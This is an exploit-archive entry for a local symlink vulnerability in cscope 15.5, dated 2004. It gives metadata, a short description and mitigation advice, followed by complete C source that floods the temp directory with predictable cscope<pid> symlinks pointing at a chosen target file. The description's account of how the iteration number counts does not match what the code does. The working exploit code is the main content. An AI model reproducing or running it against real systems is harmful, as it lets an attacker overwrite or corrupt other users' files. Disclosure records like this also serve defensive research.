RXcscope Exploit

vendor:

RXcscope

by:

Gangstuck / Psirac

7.5

CVSS

HIGH

RXcscope exploit version 15.5 and minor

CWE

Product Name: RXcscope

Affected Version From: 15.5

Affected Version To: 15.5

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2004

This exploit targets the RXcscope version 15.5 and minor. It allows an attacker to create symlinks with arbitrary names to a specified target file. The exploit takes two command line arguments: the target file and the maximum number of file creations. It then creates symlinks with names in the format cscope<process_id>.<iteration_number> in the temporary directory. The process IDs start from the current process ID and go up to the specified maximum process ID. The iteration number starts from 0 and increases by 1 for each symlink created. This exploit can be used to perform a denial of service attack by exhausting the file system with a large number of symlinks.

Mitigation:

Upgrade to a version of RXcscope that is not affected by this exploit.

Source

Exploit-DB raw data:

/* RXcscope exploit version 15.5 and minor */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BSIZE 64

int
main(int ac, char *av[]) {
        pid_t cur;
        u_int i=0, lst;
        char buffer[BSIZE + 1];
        
        fprintf(stdout, "\n --[ Cscope Exploit ]--\n"\
                        " version 15.5 and minor \n" \
                        " Gangstuck / Psirac\n" \
                        " <research@rexotec.com>\n\n");
                        
        if (ac != 3) {
                fprintf(stderr, "Usage: %s <target> <max file creation>\n", av[0]);
                return 1;
        }
        
        cur=getpid();
        lst=cur+atoi(av[2]);
        
        fprintf(stdout, " -> Current process id is ..... [%5d]\n" \
                        " -> Last process id is ........ [%5d]\n", cur, lst);
        
        while (++cur != lst) {
                snprintf(buffer, BSIZE, "%s/cscope%d.%d", P_tmpdir, cur, (i==2) ? --i : ++i);
                symlink(av[1], buffer);
        }

        return 0;
}

// milw0rm.com [2004-12-17]